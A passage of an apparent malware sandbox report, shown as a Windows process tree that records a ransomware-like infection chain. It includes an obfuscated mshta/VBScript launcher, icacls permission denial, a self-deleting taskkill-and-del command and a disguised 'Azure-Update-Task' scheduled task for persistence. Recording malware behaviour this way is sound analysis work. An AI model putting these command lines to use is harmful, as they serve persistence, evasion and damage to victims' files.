                                                                "C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "" == "" for %I In ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ) do taskkill /F /IM "%~nxI"
                                                                9⤵
                                                                  PID:2016
                                                                  • C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe
                                                                    bQRdOAPXV.exE -pOMw61vdx0wkZa3aN
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    PID:2948
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" VbsCRIPT: CLOSe ( CREateoBJect ( "wsCRIPT.sHEll" ). RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if ""-pOMw61vdx0wkZa3aN "" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
                                                                      11⤵
                                                                        PID:2076
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C TYPE "C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if "-pOMw61vdx0wkZa3aN " == "" for %I In ("C:\Users\Admin\AppData\Local\Temp\BQRDoAPXV.eXe" ) do taskkill /F /IM "%~nxI"
                                                                          12⤵
                                                                            PID:2320
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" .\wa3n.AE,EkAXs
                                                                          11⤵
                                                                            PID:3456
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /F /IM "sfx_123_206.exe"
                                                                          10⤵
                                                                          • Kills process with taskkill
                                                                          PID:2264
                                                                  • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:2672
                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpBDC2_tmp.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpBDC2_tmp.exe"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:3876
                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpBDC2_tmp.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\tmpBDC2_tmp.exe
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:3936
                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:2844
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-PC2R6.tmp\setup_2.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-PC2R6.tmp\setup_2.tmp" /SL5="$301E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:2988
                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:2188
                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                    7⤵
                                                                      PID:2912
                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:3024
                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:2972
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Mon20b2f419377.exe
                                                                4⤵
                                                                • Loads dropped DLL
                                                                PID:1580
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20b2f419377.exe
                                                                  Mon20b2f419377.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:1400
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Mon2090bc58e5d8e236.exe
                                                                4⤵
                                                                  PID:916
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2090bc58e5d8e236.exe
                                                                    Mon2090bc58e5d8e236.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:3668
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Mon20a2b9f4097300097.exe
                                                                  4⤵
                                                                  • Loads dropped DLL
                                                                  PID:1824
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20a2b9f4097300097.exe
                                                                    Mon20a2b9f4097300097.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:368
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 940
                                                                      6⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2208
                                                          • C:\Users\Admin\AppData\Local\Temp\is-VIJLC.tmp\setup_2.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-VIJLC.tmp\setup_2.tmp" /SL5="$201EA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                            PID:1372
                                                          • C:\Windows\system32\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            PID:3240
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                              2⤵
                                                                PID:3264
                                                            • C:\Users\Admin\AppData\Local\Temp\32B.exe
                                                              C:\Users\Admin\AppData\Local\Temp\32B.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:2780
                                                            • C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                              C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:3616
                                                              • C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                                C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                PID:2448
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls "C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                  3⤵
                                                                  • Modifies file permissions
                                                                  PID:2408
                                                                • C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\4C2D.exe" --Admin IsNotAutoStart IsNotTask
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:1868
                                                                  • C:\Users\Admin\AppData\Local\Temp\4C2D.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\4C2D.exe" --Admin IsNotAutoStart IsNotTask
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies extensions of user files
                                                                    PID:4028
                                                                    • C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build2.exe
                                                                      "C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build2.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:3724
                                                                      • C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build2.exe
                                                                        "C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build2.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks processor information in registry
                                                                        PID:1856
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                          7⤵
                                                                            PID:3328
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im build2.exe /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:3228
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:3588
                                                                      • C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build3.exe
                                                                        "C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build3.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:2292
                                                                        • C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build3.exe
                                                                          "C:\Users\Admin\AppData\Local\d860d004-7727-486d-b461-5498cc978783\build3.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:3448
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                            7⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            • Creates scheduled task(s)
                                                                            PID:280
                                                              • C:\Users\Admin\AppData\Local\Temp\74C3.exe
                                                                C:\Users\Admin\AppData\Local\Temp\74C3.exe
                                                                1⤵
                                                                  PID:3648
                                                                • C:\Windows\system32\DllHost.exe
                                                                  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                  1⤵
                                                                    PID:2320
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                    1⤵
                                                                    • Process spawned unexpected child process
                                                                    PID:4044
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                      2⤵
                                                                        PID:4036
                                                                    • C:\Users\Admin\AppData\Local\Temp\B76F.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\B76F.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2396
                                                                    • C:\Windows\system32\msiexec.exe
                                                                      C:\Windows\system32\msiexec.exe /V
                                                                      1⤵
                                                                      • Enumerates connected drives
                                                                      • Drops file in Program Files directory
                                                                      • Drops file in Windows directory
                                                                      • Modifies data under HKEY_USERS
                                                                      • Modifies registry class
                                                                      PID:2624
                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B6C171C1C703A30E15535286B20571D4 C
                                                                        2⤵
                                                                          PID:2960
                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 3824F249E9DF57A44A27814EF11B9A63
                                                                          2⤵
                                                                          • Blocklisted process makes network request
                                                                          PID:3300
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                            3⤵
                                                                            • Kills process with taskkill
                                                                            PID:3784
                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding D0F3B266427D847D59D7CFC25E5C0327 M Global\MSI0000
                                                                          2⤵
                                                                            PID:1688
                                                                        • C:\Users\Admin\AppData\Local\Temp\E9E5.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\E9E5.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:3536
                                                                        • C:\Windows\system32\taskeng.exe
                                                                          taskeng.exe {124101DC-1166-4ED0-B5F2-73D9D408D9AD} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                          1⤵
                                                                            PID:280
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:1140
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:2384
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2984
                                                                              • C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                2⤵
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:3916
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:3532
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:4092
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3668
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:2764
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2608
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      3⤵
                                                                                        PID:3328
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:1932
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        3⤵
                                                                                          PID:792
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:3900
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          3⤵
                                                                                            PID:2760
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:7948
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:7960
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            2⤵
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:816
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              3⤵
                                                                                                PID:3572
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:3412
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                3⤵
                                                                                                  PID:2016
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                2⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:7952
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  3⤵
                                                                                                    PID:3844
                                                                                                • C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                                  C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                                  2⤵
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:2772
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  2⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:860
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    3⤵
                                                                                                      PID:2104
                                                                                                  • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                    C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                    2⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1740
                                                                                                    • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                      C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                      3⤵
                                                                                                        PID:3792
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3004
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        3⤵
                                                                                                          PID:3108
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        2⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:8096
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          3⤵
                                                                                                            PID:3732
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          2⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:7908
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            3⤵
                                                                                                              PID:3904
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            2⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:3176
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              3⤵
                                                                                                                PID:2440
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:8188
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                3⤵
                                                                                                                  PID:8176
                                                                                                              • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:8056
                                                                                                                • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                  C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                  3⤵
                                                                                                                    PID:8140
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4732
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    3⤵
                                                                                                                      PID:4744
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:5096
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      3⤵
                                                                                                                        PID:5112
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      2⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:4576
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        3⤵
                                                                                                                          PID:4544
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        2⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4648
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          3⤵
                                                                                                                            PID:4656
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:5140
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            3⤵
                                                                                                                              PID:5184
                                                                                                                          • C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                                                            C:\Users\Admin\AppData\Roaming\gteiafb
                                                                                                                            2⤵
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:5172
                                                                                                                          • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                            C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:2908
                                                                                                                            • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                              C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                              3⤵
                                                                                                                                PID:5088
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4784
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                3⤵
                                                                                                                                  PID:3036
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:5136
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:8084
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5068
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:5152
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:5116
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      3⤵
                                                                                                                                        PID:5068
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:2908
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        3⤵
                                                                                                                                          PID:4588
                                                                                                                                      • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:5140
                                                                                                                                        • C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\c4d9b60e-0b05-4f32-93f4-49059592d6c3\4C2D.exe --Task
                                                                                                                                          3⤵
                                                                                                                                            PID:4796
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
